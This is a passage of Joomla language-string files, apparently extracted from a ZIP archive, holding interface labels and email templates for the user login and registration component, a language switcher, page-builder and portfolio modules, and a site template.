MOD_FALANG_FIELD_FULL_NAME_DESC="If set to 'Yes' and image flags set to 'No', full content languages native names are displayed. If set to 'No', upper case abbreviations from the content language sef are used. Example: EN for English, FR for French."
MOD_FALANG_FIELD_FULL_NAME_LABEL="Languages Full Names"
MOD_FALANG_FIELD_HEADER_DESC="This is the text or HTML that is displayed above the language switcher"
MOD_FALANG_FIELD_HEADER_LABEL="Pre-text"
MOD_FALANG_FIELD_INLINE_DESC="Default is set to 'Yes', i.e. to horizontal display."
MOD_FALANG_FIELD_INLINE_LABEL="Horizontal Display"
MOD_FALANG_FIELD_MODULE_LAYOUT_DESC="Use a different layout from the supplied module or overrides in the default template."
MOD_FALANG_FIELD_USEIMAGE_DESC="If set to 'Yes', will display language choice as image flags. Otherwise will use the content language native names."
MOD_FALANG_FIELD_USEIMAGE_LABEL="Use Image Flags"
MOD_FALANG_OPTION_DEFAULT_LANGUAGE="Default"
MOD_FALANG_SPACERDROP_LABEL="<u>If Use Dropdown is set to 'Yes', <br />the display options below will be ignored</u>"
;MOD_FALANG_SPACERNAME_LABEL="<u>If Use Image Flags is set to 'Yes', <br />the display options below will be ignored</u>"

;v1.4
MOD_FALANG_FIELD_IMAGEPATH_LABEL="Image Path (end with /)"
MOD_FALANG_FIELD_IMAGEPATH_DESC="Use this path to use your own icon. from the root directory ex: images/flags/"
MOD_FALANG_FIELD_IMAGETYPE_LABEL="Image Type"
MOD_FALANG_FIELD_IMAGETYPE_DESC="Use this to change the type of the image (ex gif,png,jpeg)"
MOD_FALANG_PLUGIN_DRIVER_NOT_ENABLED="Falang Database driver not enabled"
MOD_FALANG_ONLY_STANDARD_PRO="<em><b>Only available in Standard/Pro version!</b></em>"
MOD_FALANG_ONLY_PAID="<em><b>Only available in Paid version!</b></em>"

;v2.2.1
MOD_FALANG_FIELD_ADV_DROPDOWN_LABEL="Use advanced dropdown"
MOD_FALANG_FIELD_ADV_DROPDOWN_DESC="If set to 'Yes', the display parameters below will be ignored. The content languages native names will display in a dropdown."
MOD_FALANG_FIELD_SHOW_NAME_LABEL="Show name"
MOD_FALANG_FIELD_SHOW_NAME_DESC="If set to 'Yes',the language name or sef code are displayed in the advanced dropdown"
MOD_FALANG_COMMON_LABEL="<u>This parameter are valid for all display</u>"PK!ȸ�#WEWEen-GB/en-GB.com_users.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_USERS_ACTIVATION_TOKEN_NOT_FOUND="Verification code not found. Check if your account is already activated and try to log in."
COM_USERS_CAPTCHA_LABEL="Captcha"
COM_USERS_CAPTCHA_DESC="Please complete the security check."
COM_USERS_DATABASE_ERROR="Error getting the user from the database: %s"
COM_USERS_DESIRED_PASSWORD="Enter your desired password."
COM_USERS_DESIRED_USERNAME="Enter your desired username."
COM_USERS_EDIT_PROFILE="Edit Profile"
COM_USERS_EMAIL_ACCOUNT_DETAILS="Account Details for %s at %s"
COM_USERS_EMAIL_ACTIVATE_WITH_ADMIN_ACTIVATION_BODY="Hello administrator,\n\nA new user has registered at %s.\nThe user has verified their email address and requests that you approve their account.\nThis email has their details:\n\n  Name :  %s \n  email:  %s \n Username:  %s \n\nYou can activate the user by selecting on the link below:\n %s \n"
COM_USERS_EMAIL_ACTIVATE_WITH_ADMIN_ACTIVATION_SUBJECT="Registration approval required for account of %s at %s"
COM_USERS_EMAIL_ACTIVATED_BY_ADMIN_ACTIVATION_BODY="Hello %s,\n\nYour account has been activated by an administrator. You can now login at %s using the username %s and the password you chose while registering."
COM_USERS_EMAIL_ACTIVATED_BY_ADMIN_ACTIVATION_SUBJECT="Account activated for %s at %s"
COM_USERS_EMAIL_PASSWORD_RESET_BODY="Hello,\n\nA request has been made to reset your %s account password. To reset your password, you will need to submit this verification code to verify that the request was legitimate.\n\nThe verification code is %s\n\nSelect the URL below and proceed with resetting your password.\n\n %s \n\nThank you."
COM_USERS_EMAIL_PASSWORD_RESET_SUBJECT="Your %s password reset request"
COM_USERS_EMAIL_REGISTERED_BODY="Hello %s,\n\nThank you for registering at %s.\n\nYou may now log in to %s using the following username and password:\n\nUsername: %s\nPassword: %s"
COM_USERS_EMAIL_REGISTERED_BODY_NOPW="Hello %s,\n\nThank you for registering at %s.\n\nYou may now log in to %s using the username and password you registered with."
COM_USERS_EMAIL_REGISTERED_NOTIFICATION_TO_ADMIN_BODY="Hello administrator, \n\nA new user '%s', username '%s', has registered at %s."
COM_USERS_EMAIL_REGISTERED_WITH_ACTIVATION_BODY="Hello %s,\n\nThank you for registering at %s. Your account is created and must be activated before you can use it.\nTo activate the account select the following link or copy-paste it in your browser:\n%s \n\nAfter activation you may login to %s using the following username and password:\n\nUsername: %s\nPassword: %s"
COM_USERS_EMAIL_REGISTERED_WITH_ACTIVATION_BODY_NOPW="Hello %s,\n\nThank you for registering at %s. Your account is created and must be activated before you can use it.\nTo activate the account select the following link or copy-paste it in your browser:\n%s \n\nAfter activation you may login to %s using the following username and the password you entered during registration:\n\nUsername: %s"
COM_USERS_EMAIL_REGISTERED_WITH_ADMIN_ACTIVATION_BODY="Hello %s,\n\nThank you for registering at %s. Your account is created and must be verified before you can use it.\nTo verify the account select the following link or copy-paste it in your browser:\n %s \n\nAfter verification an administrator will be notified to activate your account. You'll receive a confirmation when it's done.\nOnce that account has been activated you may login to %s using the following username and password:\n\nUsername: %s\nPassword: %s"
COM_USERS_EMAIL_REGISTERED_WITH_ADMIN_ACTIVATION_BODY_NOPW="Hello %s,\n\nThank you for registering at %s. Your account is created and must be verified before you can use it.\nTo verify the account select the following link or copy-paste it in your browser:\n %s \n\nAfter verification an administrator will be notified to activate your account. You'll receive a confirmation when it's done.\nOnce that account has been activated you may login to %s using the following username and the password you entered during registration:\n\nUsername: %s"
COM_USERS_EMAIL_USERNAME_REMINDER_BODY="Hello,\n\nA username reminder has been requested for your %s account.\n\nYour username is %s.\n\nTo login to your account, select the link below.\n\n%s \n\nThank you."
COM_USERS_EMAIL_USERNAME_REMINDER_SUBJECT="Your %s username"
COM_USERS_ERROR_SECRET_CODE_WITHOUT_TFA="You have entered a Secret Code but two factor authentication is not enabled in your user account. If you want to use a secret code to secure your login please edit your user profile and enable two factor authentication."
COM_USERS_FIELD_PASSWORD_RESET_DESC="Please enter the email address associated with your User account.<br />A verification code will be sent to you. Once you have received the verification code, you will be able to choose a new password for your account."
COM_USERS_FIELD_PASSWORD_RESET_LABEL="Email Address"
COM_USERS_FIELD_REMIND_EMAIL_DESC="Please enter the email address associated with your User account.<br />Your username will be emailed to the email address on file."
COM_USERS_FIELD_REMIND_EMAIL_LABEL="Email Address"
COM_USERS_FIELD_RESET_CONFIRM_TOKEN_DESC="Enter the password reset verification code you received by email."
COM_USERS_FIELD_RESET_CONFIRM_TOKEN_LABEL="Verification Code"
COM_USERS_FIELD_RESET_CONFIRM_USERNAME_DESC="Enter your username."
COM_USERS_FIELD_RESET_CONFIRM_USERNAME_LABEL="Username"
COM_USERS_FIELD_RESET_PASSWORD1_DESC="Enter your new password."
COM_USERS_FIELD_RESET_PASSWORD1_LABEL="Password"
COM_USERS_FIELD_RESET_PASSWORD1_MESSAGE="The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field."
COM_USERS_FIELD_RESET_PASSWORD2_DESC="Confirm your new password."
COM_USERS_FIELD_RESET_PASSWORD2_LABEL="Confirm Password"
COM_USERS_INVALID_EMAIL="Invalid email address"
COM_USERS_LOGIN_DEFAULT_LABEL="User Login"
COM_USERS_LOGIN_IMAGE_ALT="Login image"
COM_USERS_LOGIN_REGISTER="Don't have an account?"
COM_USERS_LOGIN_REMEMBER_ME="Remember me"
COM_USERS_LOGIN_REMIND="Forgot your username?"
COM_USERS_LOGIN_RESET="Forgot your password?"
COM_USERS_LOGIN_USERNAME_LABEL="Username"
COM_USERS_MAIL_FAILED="Failed sending email."
COM_USERS_MAIL_SEND_FAILURE_BODY="An error was encountered when sending the user registration email. The error is: %s The user who tried to register is: %s"
COM_USERS_MAIL_SEND_FAILURE_SUBJECT="Error sending email"
COM_USERS_MSG_NOT_ENOUGH_INTEGERS_N="Password does not have enough digits. At least %s digits are required."
COM_USERS_MSG_NOT_ENOUGH_INTEGERS_N_1="Password does not have enough digits. At least 1 digit is required."
COM_USERS_MSG_NOT_ENOUGH_LOWERCASE_LETTERS_N="Password does not have enough lower case characters. At least %s lower case characters are required."
COM_USERS_MSG_NOT_ENOUGH_LOWERCASE_LETTERS_N_1="Password does not have enough lower case characters. At least 1 lower case character is required."
COM_USERS_MSG_NOT_ENOUGH_SYMBOLS_N="Password does not have enough symbols (such as !@#$). At least %s symbols are required."
COM_USERS_MSG_NOT_ENOUGH_SYMBOLS_N_1="Password does not have enough symbols (such as !@#$). At least 1 symbol is required."
COM_USERS_MSG_NOT_ENOUGH_UPPERCASE_LETTERS_N="Password does not have enough upper case characters. At least %s upper case characters are required."
COM_USERS_MSG_NOT_ENOUGH_UPPERCASE_LETTERS_N_1="Password does not have enough upper case characters. At least 1 upper case character is required."
COM_USERS_MSG_PASSWORD_TOO_LONG="Password is too long. Passwords must be less than 100 characters."
COM_USERS_MSG_PASSWORD_TOO_SHORT_N="Password is too short. Passwords must have at least %s characters."
COM_USERS_MSG_SPACES_IN_PASSWORD="Password must not have spaces."
COM_USERS_OPTIONAL="(optional)"
COM_USERS_OR="or"
COM_USERS_PROFILE="User Profile"
COM_USERS_PROFILE_BIND_FAILED="Could not bind profile data: %s"
COM_USERS_PROFILE_CORE_LEGEND="Profile"
COM_USERS_PROFILE_CUSTOM_LEGEND="Custom Profile"
COM_USERS_PROFILE_DEFAULT_LABEL="Edit Your Profile"
COM_USERS_PROFILE_EMAIL1_DESC="Enter your email address."
COM_USERS_PROFILE_EMAIL1_LABEL="Email Address"
; The following string is deprecated and will be removed with 4.0
COM_USERS_PROFILE_EMAIL1_MESSAGE="The email address you entered is already in use or invalid. Please enter another email address."
COM_USERS_PROFILE_EMAIL2_DESC="Confirm your email address."
COM_USERS_PROFILE_EMAIL2_LABEL="Confirm Email Address"
COM_USERS_PROFILE_EMAIL2_MESSAGE="The email addresses you entered do not match. Please enter your email address in the email address field and confirm your entry by entering it in the confirm email address field."
COM_USERS_PROFILE_LAST_VISITED_DATE_LABEL="Last Visited Date"
COM_USERS_PROFILE_MY_PROFILE="My Profile"
COM_USERS_PROFILE_NAME_DESC="Enter your full name."
COM_USERS_PROFILE_NAME_LABEL="Name"
COM_USERS_PROFILE_NEVER_VISITED="This is the first time you visit this site"
COM_USERS_PROFILE_NOCHANGE_USERNAME_DESC="If you want to change your username, please contact a site administrator."
COM_USERS_PROFILE_OTEPS="One time emergency passwords"
COM_USERS_PROFILE_OTEPS_DESC="If you do not have access to your two factor authentication device you can use any of the following passwords instead of a regular security code. Each one of these emergency passwords is immediately destroyed upon use. We recommend printing these passwords out and keeping the printout in a safe and accessible location, eg your wallet or a safety deposit box."
COM_USERS_PROFILE_OTEPS_WAIT_DESC="There are no emergency one time passwords generated in your account. The passwords will be generated automatically and displayed here as soon as you activate two factor authentication."
COM_USERS_PROFILE_PASSWORD1_LABEL="Password"
COM_USERS_PROFILE_PASSWORD1_MESSAGE="The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field."
COM_USERS_PROFILE_PASSWORD2_DESC="Confirm your password."
COM_USERS_PROFILE_PASSWORD2_LABEL="Confirm Password"
COM_USERS_PROFILE_REGISTERED_DATE_LABEL="Registered Date"
COM_USERS_PROFILE_SAVE_FAILED="Profile could not be saved: %s"
COM_USERS_PROFILE_SAVE_SUCCESS="Profile saved."
COM_USERS_PROFILE_TWO_FACTOR_AUTH="Two Factor Authentication"
COM_USERS_PROFILE_TWOFACTOR_LABEL="Authentication Method"
COM_USERS_PROFILE_TWOFACTOR_DESC="Select the two factor authentication method you want to use."
COM_USERS_PROFILE_USERNAME_DESC="Enter your desired username."
COM_USERS_PROFILE_USERNAME_LABEL="Username"
COM_USERS_PROFILE_USERNAME_MESSAGE="The username you entered is not available. Please pick another username."
COM_USERS_PROFILE_VALUE_NOT_FOUND="No Information Entered"
COM_USERS_PROFILE_WELCOME="Welcome, %s"
COM_USERS_REGISTER_DEFAULT_LABEL="Create An Account"
COM_USERS_REGISTER_EMAIL1_DESC="Enter your email address."
COM_USERS_REGISTER_EMAIL1_LABEL="Email Address"
; The following string is deprecated and will be removed with 4.0
COM_USERS_REGISTER_EMAIL1_MESSAGE="The email address you entered is already in use or invalid. Please enter another email address."
COM_USERS_REGISTER_EMAIL2_DESC="Confirm your email address."
COM_USERS_REGISTER_EMAIL2_LABEL="Confirm Email Address"
COM_USERS_REGISTER_EMAIL2_MESSAGE="The email addresses you entered do not match. Please enter your email address in the email address field and confirm your entry by entering it in the confirm email address field."
COM_USERS_REGISTER_NAME_DESC="Enter your full name."
COM_USERS_REGISTER_NAME_LABEL="Name"
COM_USERS_REGISTER_PASSWORD1_LABEL="Password"
COM_USERS_REGISTER_PASSWORD1_MESSAGE="The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field."
COM_USERS_REGISTER_PASSWORD2_DESC="Confirm your password."
COM_USERS_REGISTER_PASSWORD2_LABEL="Confirm Password"
COM_USERS_REGISTER_REQUIRED="<strong class="_QQ_"red"_QQ_">*</strong> Required field"
COM_USERS_REGISTER_USERNAME_DESC="Enter your desired username."
COM_USERS_REGISTER_USERNAME_LABEL="Username"
COM_USERS_REGISTER_USERNAME_MESSAGE="The username you entered is not available. Please pick another username."
COM_USERS_REGISTRATION="User Registration"
COM_USERS_REGISTRATION_ACL_ADMIN_ACTIVATION="Please log in to confirm that you are authorised to activate new accounts."
COM_USERS_REGISTRATION_ACL_ADMIN_ACTIVATION_PERMISSIONS="You are not authorised to activate new accounts, please log in with a privileged account."
COM_USERS_REGISTRATION_ACTIVATE_SUCCESS="Your Account has been activated. You can now log in using the username and password you chose during the registration."
COM_USERS_REGISTRATION_ACTIVATION_NOTIFY_SEND_MAIL_FAILED="An error was encountered while sending activation notification email"
COM_USERS_REGISTRATION_ACTIVATION_SAVE_FAILED="Failed to save activation data: %s"
COM_USERS_REGISTRATION_ADMINACTIVATE_SUCCESS="The user's account has been activated and the user has been notified about it."
COM_USERS_REGISTRATION_BIND_FAILED="Failed to bind registration data: %s"
COM_USERS_REGISTRATION_COMPLETE_ACTIVATE="Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by selecting the activation link when you get the email before you can login."
COM_USERS_REGISTRATION_COMPLETE_VERIFY="Your account has been created and a verification link has been sent to the email address you entered. Note that you must verify the account by selecting the verification link when you get the email and then an administrator will activate your account before you can login."
COM_USERS_REGISTRATION_DEFAULT_LABEL="User Registration"
COM_USERS_REGISTRATION_SAVE_FAILED="Registration failed: %s"
COM_USERS_REGISTRATION_SAVE_SUCCESS="Thank you for registering. You may now log in using the username and password you registered with."
COM_USERS_REGISTRATION_SEND_MAIL_FAILED="An error was encountered while sending the registration email. A message has been sent to the administrator of this site."
COM_USERS_REGISTRATION_VERIFY_SUCCESS="Your email address has been verified. Once an administrator approves your account you will be notified by email and you can login to the site."
COM_USERS_REMIND="Reminder"
COM_USERS_REMIND_DEFAULT_LABEL="Please enter the email address associated with your User account. Your username will be emailed to the email address on file."
COM_USERS_REMIND_EMAIL_LABEL="Your Email"
COM_USERS_REMIND_LIMIT_ERROR_N_HOURS="You have exceeded the maximum number of password resets allowed. Please try again in %s hours."
COM_USERS_REMIND_LIMIT_ERROR_N_HOURS_1="You have exceeded the maximum number of password resets allowed. Please try again in one hour."
COM_USERS_REMIND_REQUEST_ERROR="Error requesting password reminder."
COM_USERS_REMIND_REQUEST_FAILED="Reminder failed: %s"
COM_USERS_REMIND_REQUEST_SUCCESS="Reminder sent. Please check your mail."
COM_USERS_REMIND_SUPERADMIN_ERROR="A Super User can't request a password reminder. Please contact another Super User or use an alternative method."
COM_USERS_RESET="Password Reset"
COM_USERS_RESET_COMPLETE_ERROR="Error completing password reset."
COM_USERS_RESET_COMPLETE_FAILED="Completing reset password failed: %s"
COM_USERS_RESET_COMPLETE_LABEL="To complete the password reset process, please enter a new password."
COM_USERS_RESET_COMPLETE_SUCCESS="Reset password successful. You may now login to the site."
COM_USERS_RESET_CONFIRM_ERROR="Error while confirming the password."
COM_USERS_RESET_CONFIRM_FAILED="Your password reset confirmation failed because the verification code was invalid. %s"
COM_USERS_RESET_CONFIRM_LABEL="An email has been sent to your email address. The email has a verification code, please paste the verification code in the field below to prove that you are the owner of this account."
COM_USERS_RESET_COMPLETE_TOKENS_MISSING="Your password reset confirmation failed because the verification code was missing."
COM_USERS_RESET_REQUEST_ERROR="Error requesting password reset."
COM_USERS_RESET_REQUEST_FAILED="Reset password failed: %s"
COM_USERS_RESET_REQUEST_LABEL="Please enter the email address for your account. A verification code will be sent to you. Once you have received the verification code, you will be able to choose a new password for your account."
COM_USERS_SETTINGS_FIELDSET_LABEL="Basic Settings"
COM_USERS_USER_BLOCKED="This user is blocked. If this is an error, please contact an administrator."
COM_USERS_USER_FIELD_BACKEND_LANGUAGE_DESC="Choose your default language for the Backend."
COM_USERS_USER_FIELD_BACKEND_LANGUAGE_LABEL="Backend Language"
COM_USERS_USER_FIELD_BACKEND_TEMPLATE_DESC="Select the template style for the Administrator Backend interface. This will only affect this User."
COM_USERS_USER_FIELD_BACKEND_TEMPLATE_LABEL="Backend Template Style"
COM_USERS_USER_FIELD_EDITOR_DESC="Choose your text editor."
COM_USERS_USER_FIELD_EDITOR_LABEL="Editor"
COM_USERS_USER_FIELD_FRONTEND_LANGUAGE_DESC="Choose your default language for the Frontend."
COM_USERS_USER_FIELD_FRONTEND_LANGUAGE_LABEL="Frontend Language"
; The following two strings are deprecated and will be removed with 4.0.
COM_USERS_USER_FIELD_HELPSITE_DESC="Help site for the Backend."
COM_USERS_USER_FIELD_HELPSITE_LABEL="Help Site"
COM_USERS_USER_FIELD_TIMEZONE_DESC="Choose your time zone."
COM_USERS_USER_FIELD_TIMEZONE_LABEL="Time Zone"
COM_USERS_USER_NOT_FOUND="User not found."
COM_USERS_USER_SAVE_FAILED="Failed to save user: %s"
PK!ǺhY��!en-GB/en-GB.mod_syndicate.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_SYNDICATE="Syndication Feeds"
MOD_SYNDICATE_XML_DESCRIPTION="Smart Syndication Module that creates a Syndicated Feed for the page where the Module is displayed."
MOD_SYNDICATE_LAYOUT_DEFAULT="Default"

PK!$�agg!en-GB/en-GB.mod_sppagebuilder.ininu&1i�MOD_SPPAGEBUILDER="SP Page Builder"

; Ajax Contact
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME="Name"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL="Email"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT="Subject"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE="Message"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND="Send Message"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_WRONG_CAPTCHA="Wrong answer! Please enter right answer."
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUCCESS="Email sent successfully!"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FAILED="Email sent failed."

; Tweet Addon
COM_SPPAGEBUILDER_TWEET_FOLLOWERS="Followers"
COM_SPPAGEBUILDER_TWEET_FOLLOW="Follow"
COM_SPPAGEBUILDER_SECOND="Second"
COM_SPPAGEBUILDER_SECONDS="Seconds"
COM_SPPAGEBUILDER_MINUTE="Minute"
COM_SPPAGEBUILDER_MINUTES="Minutes"
COM_SPPAGEBUILDER_HOUR="Hour"
COM_SPPAGEBUILDER_HOURS="Hours"
COM_SPPAGEBUILDER_DAY="Day"
COM_SPPAGEBUILDER_DAYS="Days"
COM_SPPAGEBUILDER_MONTHS="Months"
COM_SPPAGEBUILDER_MONTH="Month"
COM_SPPAGEBUILDER_YEAR="Year"
COM_SPPAGEBUILDER_YEARS="Years"
COM_SPPAGEBUILDER_AGO="ago"

; Addon Social Share
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TOTAL_SHARES="Shares"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_FACEBOOK="Facebook"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TWITTER="Twitter"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GOOGLE_PLUS="Google Plus"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_LINKEDIN="Linkedin"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_PINTEREST="Pinterest"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_THUMBLR="Thublr"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GETPOCKET="Getpocket"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_REDDIT="Reddit"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_VK="VK"PK!�8���%en-GB/en-GB.mod_spsimpleportfolio.ininu&1i�; Admin
MOD_SP_SIMPLEPORTFOLIO="SP SIMPLE PORTFOLIO"
MOD_SPSIMPLEPORTFOLIO_FIELD_LIMIT="Number of Items"
MOD_SPSIMPLEPORTFOLIO_FIELD_LIMIT_DESC="Please enter the number of items to display per page."
MOD_SPSIMPLEPORTFOLIO_FIELD_LAYOUT_TYPES="Layout Settings"
MOD_SPSIMPLEPORTFOLIO_FIELD_LAYOUT_TYPES_DESC="Select a layout from the list."
MOD_SPSIMPLEPORTFOLIO_FIELD_LAYOUT_DEFAULT="Default"
MOD_SPSIMPLEPORTFOLIO_FIELD_LAYOUT_GALLERY_SPACE="Gallery style with space"
MOD_SPSIMPLEPORTFOLIO_FIELD_LAYOUT_GALLERY_NOSPACE="Gallery style without space"

MOD_SPSIMPLEPORTFOLIO_FIELD_COLUMNS="Columns"
MOD_SPSIMPLEPORTFOLIO_FIELD_COLUMNS_DESC="Select number of columns per row."
MOD_SPSIMPLEPORTFOLIO_FIELD_LAYOUT_COLUMNS_2="2 Columns"
MOD_SPSIMPLEPORTFOLIO_FIELD_LAYOUT_COLUMNS_3="3 Columns"
MOD_SPSIMPLEPORTFOLIO_FIELD_LAYOUT_COLUMNS_4="4 Columns"

MOD_SPSIMPLEPORTFOLIO_SHOW_FILTER_BUTTONS="Show Filters"
MOD_SPSIMPLEPORTFOLIO_SHOW_FILTER_BUTTONS_DESC="Enable to show filter buttons"

MOD_SPSIMPLEPORTFOLIO_THUMBNAIL_SIZE="Thumbnail Size"
MOD_SPSIMPLEPORTFOLIO_THUMBNAIL_SIZE_DESC="Select a thumbnail size which will show in the item list."
MOD_SPSIMPLEPORTFOLIO_THUMBNAIL_MASONRY="Masonry"
MOD_SPSIMPLEPORTFOLIO_THUMBNAIL_SQUARE="Square"
MOD_SPSIMPLEPORTFOLIO_THUMBNAIL_RECTANGULAR="Rectangular"
MOD_SPSIMPLEPORTFOLIO_THUMBNAIL_TOWER="Tower"

MOD_SPSIMPLEPORTFOLIO_THUMBNAIL_TYPE="Thumbnail Type"
MOD_SPSIMPLEPORTFOLIO_FIELD_POPUP_IMAGE="Popup Size"
MOD_SPSIMPLEPORTFOLIO_FIELD_POPUP_IMAGE_DESC="Select a popup image size from the list (select default for your default uploaded image)."
MOD_SPSIMPLEPORTFOLIO_FIELD_POPUP_IMAGE_DEFAULT="Default"
MOD_SPSIMPLEPORTFOLIO_FIELD_POPUP_IMAGE_SQUARE="Square"
MOD_SPSIMPLEPORTFOLIO_FIELD_POPUP_IMAGE_RECTANGLE="Rectangle"
MOD_SPSIMPLEPORTFOLIO_FIELD_POPUP_IMAGE_TOWER="Tower"

; Frontend
MOD_SPSIMPLEPORTFOLIO_SHOW_ALL="Show All"
MOD_SPSIMPLEPORTFOLIO_ZOOM="Zoom"
MOD_SPSIMPLEPORTFOLIO_WATCH="Watch"
MOD_SPSIMPLEPORTFOLIO_VIEW="View"

; Category
MOD_SPSIMPLEPORTFOLIO_CATEGORY="Select a category"
MOD_SPSIMPLEPORTFOLIO_CATEGORY_DESC=""
MOD_SPSIMPLEPORTFOLIO_CATEGORY_ALL="All Categories"

; FLEX’S ADD (SP Simple Portfolio)
COM_SPSIMPLEPORTFOLIO_SHOW_VIEW_BUTTON="Show “View” button"
COM_SPSIMPLEPORTFOLIO_SHOW_VIEW_BUTTON_DESC="Enables “View” button link to portfolio’s item details."
COM_SPSIMPLEPORTFOLIO_SHOW_ZOOM_BUTTON="Show “Zoom” button"
COM_SPSIMPLEPORTFOLIO_SHOW_ZOOM_BUTTON_DESC="Enables “Zoom” button to open image(s) in popup."
COM_SPSIMPLEPORTFOLIO_SHOW_TAGS="Show “Tags”"
COM_SPSIMPLEPORTFOLIO_SHOW_TAGS_DESC="Enables “Tag(s)” under the tile."
COM_SPSIMPLEPORTFOLIO_FIELD_FILTER_STYLE="Filter Style"
COM_SPSIMPLEPORTFOLIO_FIELD_FILTER_STYLE_DESC="Select Style for Filter from the list"
COM_SPSIMPLEPORTFOLIO_FIELD_FILTER_STYLE_SIMPLE="Simple"
COM_SPSIMPLEPORTFOLIO_FIELD_FILTER_STYLE_FLEX="Flex"
COM_SPPORTFOLIO_SHOW_FILTER_DIVIDER_LABEL="Filter Divider"
COM_SPPORTFOLIO_SHOW_FILTER_DIVIDER_LABEL_DESC="You can use text or icon as divider between filter tabs, for example: “/”, “~” or “{}”. Only for “Simple” filter style."
SPSIMPLEPORTFOLIO_COLUMN_BACKGROUND_COLOR="Column’s Background color"
SPSIMPLEPORTFOLIO_COLUMN_BACKGROUND_COLOR_DESC="Set column’s custom background color, if you don’t want default."

COM_SPPORTFOLIO_FILTER="Portfolio Filter"
COM_SPPORTFOLIO_SHOW_ALL_TXT_LABEL="Custom “Show All” text"
COM_SPPORTFOLIO_SHOW_ALL_TXT_DESC="“Show All” text for first tab/button in filter. Other tabs are dynamically named as tags you’ve created."
COM_SPPORTFOLIO_FILTER_MARGIN_LABEL="Margin between tags (px)"
COM_SPPORTFOLIO_FILTER_MARGIN_DESC="Custom margin (gap) between tags in filter."

COM_SPSIMPLEPORTFOLIO_VIDEO_WIDTH="Video width in lightbox"
COM_SPSIMPLEPORTFOLIO_VIDEO_WIDTH_DESC="Set the custom width (px) of video (iframe) in popup lightbox. Default: 700."
COM_SPSIMPLEPORTFOLIO_VIDEO_HEIGHT="Video height in lightbox"
COM_SPSIMPLEPORTFOLIO_VIDEO_HEIGHT_DESC="Set the custom height (px) of video (iframe) in popup lightbox. Default: 400."PK!�A(���en-GB/en-GB.tpl_flex.ininu&1i�; Common
HELIX_YES="Yes"
HELIX_NO="No"
FLEX_YES="Yes"
FLEX_NO="No"
HELIX_SHOW="Show"
HELIX_HIDE="Hide"

; Basic Tab
JDETAILS="<i class='fa fa-home'></i>Basic"

HELIX_GLOBAL="Global"
HELIX_PRELOADER="Preloader"
HELIX_PRELOADER_DESC="Yes to enable preloader"
HELIX_PRELOADER_ANIMATION="Preloader Animation"
HELIX_PRELOADER_ANIMATION_DESC="Select a preloader animation from the list"
HELIX_PRELOADER_ANIMATION_CIRCLE="Circle"
HELIX_PRELOADER_ANIMATION_DOUBLE_LOOP="Double Loop"
HELIX_PRELOADER_ANIMATION_RING="Ring"
HELIX_PRELOADER_ANIMATION_AUDIO_WAVE="Audio Wave"
HELIX_PRELOADER_ANIMATION_WAVE_TWO="Wave Two"
HELIX_PRELOADER_ANIMATION_CIRCLE_TWO="Circle Two"
HELIX_PRELOADER_ANIMATION_FLIP="Flip"
HELIX_PRELOADER_ANIMATION_MOON="Moon"
HELIX_PRELOADER_ANIMATION_CLOCK="Clock"
HELIX_PRELOADER_ANIMATION_LOGO="Logo"

HELIX_PRELOADER_BG_COLOR="Preloader Background color"
HELIX_PRELOADER_BG_COLOR_DESC="Select a background color for preloader"
HELIX_PRELOADER_TX_COLOR="Preloader Text Color"
HELIX_PRELOADER_TX_COLOR_DESC="Select a text color for preloader"

HELIX_GOTO_TOP="Go To Top"
HELIX_GO_TOP_DESC="Yes to show go to top when scroll in bottom"
HELIX_FAVICON="Favicon"
HELIX_FAVICON_DESC="Upload a 16px x 16px .png or .gif image that will be your favicon."
HELIX_LOGO="Logo"
HELIX_LOGO_TYPE="Logo Type"
HELIX_LOGO_TYPE_DESC="Select logo type from the list."
HELIX_LOGO_TYPE_IMAGE="Image"
HELIX_LOGO_TYPE_IMAGE_DESC="Select/upload logo image."
HELIX_LOGO_TYPE_IMAGE_RETINA="Retina Logo"
HELIX_LOGO_TYPE_IMAGE_RETINA_DESC="Upload a double size of your logo to keep look great of higher resulationary devices like retina or 5k display."
HELIX_LOGO_TYPE_TEXT="Text"
HELIX_LOGO_TYPE_TEXT_DESC="Enter logo text."
HELIX_LOGO_SLOGAN="Logo Slogan"
HELIX_LOGO_SLOGAN_DESC="Enter slogan text."
HELIX_MODULE_POSITIONS="Module Position"
HELIX_MODULE_POSITIONS_DESC="Select a suitable module position where you want to display this feature."
HELIX_MOBILE_LOGO="Mobile Logo"
HELIX_MOBILE_LOGO_DESC="This logo will be shown in mobile view instead of default logo. Leave blank if you do not want to show different logo for mobile devices."

HELIX_FEATURE_LOAD_POS="Feature Load Position"
HELIX_FEATURE_LOAD_POS_DESC="if your selected module position (for feature) has also module then it will works. This is specially where you want to show this feature, before module or after module"
HELIX_FEATURE_LOAD_POS_DEFAULT="Default"
HELIX_FEATURE_LOAD_POS_BEFORE="Before Module"
